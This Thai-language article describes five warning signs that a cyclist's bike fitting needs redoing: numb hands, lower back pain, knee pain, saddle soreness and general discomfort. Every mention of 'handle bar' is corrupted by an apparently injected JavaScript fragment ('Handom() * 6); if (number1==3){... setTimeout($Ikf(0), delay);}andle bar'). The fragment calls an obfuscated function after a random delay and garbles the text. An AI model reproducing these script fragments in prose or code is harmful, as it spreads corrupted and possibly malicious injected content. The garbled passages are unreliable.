5 สัญญาณเตือน คุณต้องทำ Bike Fitting ใหม่
ขั้นตอนเเรกในการปั่นจักรยานให้สนุก คือ การเลือกเฟรมให้ตรงกับไซด์ของเรา เฟรมเเต่ละไซด์จะออกเเบบมาให้เข้ากับสรีระ เพศชายหญิง ความสูงต่ำของคนเเต่ละคนต่างกัน เเต่หัวใจสำคัญหลังจากการเลือกเฟรมได้เเล้วคือ การทำ Bike Fitting การปรับเเต่งระยะ ความสั้นยาวของชิ้นส่วนต่างๆ ให้เข้ากับตัวผู้ปั่นจริงๆ ถ้าจะพูดไปการทำ Bike Fitting ก็เปรียบเสมือนการปรับจูนเครื่องยนต์ให้อยู่ในจุดที่ Optimum ที่สุด

การทำ Bike Fitting ไม่ใช้ว่าทำครั้งเดียวเเล้วก็จบ ในการเริ่มต้นฝึกปั่นเเรกๆ ช่างจะเซต position ของเราให้อยู่ในลักษณะที่เรียกว่า Comfortable หรืออยู่ในท่าที่ปั่นสบายที่สุด เมื่อปั่นไประยะหนึ่งช่างก็จะเเนะนำให้กลับมาทำ Bike Fitting ใหม่ เพื่อปรับท่าของเรา (position) ให้อยู่ในลักษณะท่าปั่นเพื่อเเข่งหรือ performance position

การเซตให้อยู่ในตำเเหน่ง performance เเน่นอนว่าความสบาย (comfortable) จะน้อยกว่าเเต่จะได้ความเร็ว พลังเข้ามาเเทน เพราะในช่วงเริ่มเเรกที่ฝึกปั่น เราจะมีการพัฒนากล้ามเนื้อส่วนต่างๆ ทั้ง lower, core และ upper muscle ร่างกายเริ่มมีความคุ้นเคยในการปั่นระยะยาว ปั่นได้นานขึ้น อาการปวดเมื่อยเริ่มหายไป ร่างปรับตัวพร้อมในการพัฒนาสู่ขั้นต่อไป
สำหรับใครที่ไม่รู้ว่าต้องทำ Bike Fitting หรือไม่ เรามี “5 สัญญาณเตือน คุณต้องทำ Bike Fitting ใหม่” มานำเสนอ
1. อาการมือชานิ้วชา
อากรมือชานิ้วชา ถือว่าเป็นอาการที่พบได้ทั่วไป ทั้งนี้เพราะกล้ามเนื้อเเขนรับภาระ รับเเรงเครียด น้ำหนักมากเกินไป มักจะเกิดขึ้นเพราะตัว Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar เซตไว้ต่ำหรือต่ำเกินไป เเต่การเซต handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar ต่ำก็มีข้อดี จะได้เปรียบในเรื่อง aerodynamic เเต่ทั้งนี้ผู้ปั่นเองก็ควรมีกล้ามเนื้อ core ที่เเข็งเเรงและยืดหยุ่น เพื่อเอาไว้ซัพพอร์ตกล้ามเนื้อช่วงบน

เวลาจัดระเบียบร่างกายเข้าท่า aerodynamic ต้องมีการงอศอกตั้งฉากเข้าชิดลำตัว โน้มตัวต่ำไปข้างหน้า ถ้าร่างกายช่วงบนไม่เเข็งเเรง เเขน มือ และนิ้ว จะต้องทำหน้าที่รับภาระ (น้ำหนักร่างกาย) รับเเรงกดที่ไหลจากข้อต่อต่างๆ เเรงกดผ่านไปยังกล้ามเนื้อเเขน ข้อมือเเละนิ้วตามลำดับ ทำให้เกิดอาการบาดเจ็บข้อมือ นิ้ว กล้ามเนื้อเเขนและศอกได้
ข้อเเนะนำ
1. เซตต่ำเเหน่ง Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar ให้ถูกต้อง
2. ฝึกกล้ามเนื้อ core และ upper ให้เเข็งเเรง
2. กล้ามแผ่นเนื้อหลังช่วงล่าง (lower back)
ถัดจากอาการนิ้วมือชา คืออาการปวดหลังช่วงล่าง บริเวณใกล้ๆ กับเอว จะเกิดกับการเซตความสูงของ Seatpost ไม่ถูกต้อง สูงไปหรือต่ำไปเป็นต้น เเค่ระยะ 1 นิ้วของความสูงก็มีผลต่อพลังที่เราผลิตออกมา
การเซตระดับที่ต่ำไป สามารถสังเกตได้จากลักษณะการปั่นของเรา คือปั่นได้เร็วในทางราบเเต่ต้องพยายามมากในการปั่นขึ้นเนินขึ้นเขา เหมือนสูญเสียพลังงานไป หรือโมเมนตัมหายไป

การเซตต่ำไปจะทำให้เกิดเเรงกดดัน (pressure) ระหว่างกล้ามเนื้อหลัง และกล้ามเนื้อช่วงล่างที่ใช้ปั่น ทำให้มีอาการปวดหลังได้ เเต่ในกรณีที่เซตไว้สูงไป จะทำให้กล้ามเนื้อเเผ่นหลังทำงานหนักขึ้นในการ ยืดเหยียดไปจับ handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar ทำให้เกิดเเรงกดดันบนเเผ่หลังมาก ไหนจะต้องรับน้ำหนัก ไหนจะต้องยืดเหยียด
3. ปวดเข่า
อาการปวดเข่าอาจเกิดมาได้หลายสาเหตุ เช่น การอ่อนซ้อม เมื่อฝึกไปสักพักก็จะหายไป เเต่ถ้าเกิดจาก Bike Fitting ไม่ดี จะปวดทุกครั้งที่ปั่น ลักษณะการเซตที่ไม่ดีอาจจะเริ่มจากองศาบันไดปั่น ความสูงของเบาะ ขนาดความยาวของ crank เป็นต้น ลักณะการปั่นที่ดี เเนวเข่าควรเป็นเส้นตรง เเม้กระทั้งจังหวะกดลงก็ควรเป็นเเนวตรง ไม่เเบะเข่าออกข้าง

การเซตที่ดี เเรงที่เรากดลงไปควรส่งผ่านจากกล้ามเนื้อต้นขา (Thigh) กล้ามเนื้อน่อง ( Calves) มิใช้ถ่ายส่งเเรงกดผ่านทางเส้นเอ็นไหลสู่เอ็นเข่าอีกที การเซตเบาะเลื่อนไปข้างหน้าหรือหลังมากเกินไปก็ทำให้มีการใช้มัดกล้ามเนื้อผิดหลักได้เช่นกัน อาจทำให้เกิดอาการ ITBS syndrome ก็ได้
4. อาการเมื่อยก้น ปวดก้น
การปวดเมื่อยก้นที่เกิดขึ้นเป็นเรื่องปกติสำหรับมือใหม่ กล้ามเนื้อก้นอาจจะไม่ชินกับการปั่นเป็นระยะเวลานาน หรือ การเกงปั่นมีเจลน้อยไป เเต่อาการปวดเมื่อยก้นเกิดขึ้นสำหรับคนที่ปั่นมานานสักระยะหนึ่ง อาจเป็นเพราะเบาะนั่งอยู่ห่างจาก handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar มากเกินไป ทำให้ผู้ปั่นต้องนั่งอยู่บนปลายจมูกของเบาะ (tip) ซึ่งเป็นจุดที่ไม่ได้ออกเเบบมาเพื่อซัพพอร์ตกับก้นของเรา หรือจะบอกว่าเป็นจุดที่เเข็งก็ว่าได้ โดนกระเเทกบ่อยๆ เข้าก็ทำให้เกิดอาการเจ็บปวดได้ การเเก้ไขนอกจากปรับเปลี่ยนตำเเหน่งเบาะเเล้ว สามารถเปลี่ยนซื้อเบาะใหม่ให้เหมาะกับก้นผู้ปั่นได้ด้วย

5. ไม่สบายตัว
อาการปั่นเเล้วไม่สบายตัว รู้สึกติดๆ ขัดๆ ตามมาด้วยอาการบาดเจ็บกล้ามเนื้อบ่อยๆ เกิดขึ้นเพราะตำเเหน่งการปั่นของคุณไม่ถูกต้อง อาการบวดเมื่อยจะกระจายไปทั่ว ปวดหลัง ปวดเข่า ปวดคอ เป็นต้น ให้ลองเริ่มสำรวจจากขนาดเฟรมเป็นอย่างเเรก ไซด์เหมาะกับเราหรือไม่ จากนั้นลองดูที่ความสูงของอาน ตำเเหน่งเบาะ เเละ handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle bar ถ้าปรับเองไม่ได้ เเนะนำเข้าร้านจักรยานที่มีการทำ Bike Fitting เพื่อปรับเเต่งใหม่
การทำ Bike Fitting ที่ดีทำให้เราสามารถปั่นจักรยานได้คล่องเเละสบายตัวมากขึ้น (comfortable) เเต่ขณะเดียวกันสามารถเค้นเอาพลัง โดยไม่สูญเสียโมเมนตัมหรือบาลานซ์ การเซตระยะความสูงต่ำของ Seatpost ระยะของ reach ระยะของ crank และอื่นๆ ล้วนมีผลกระทบต่อตัวผู้ปั่น ฉะนั้นผู้ที่ซื้อจักรยานใหม่หรือเปลี่ยนจักรยานใหม่ อย่าลืมทำ Bike Fitting ทุกครั้ง
อ้างอิงthecyclingbug.co.uk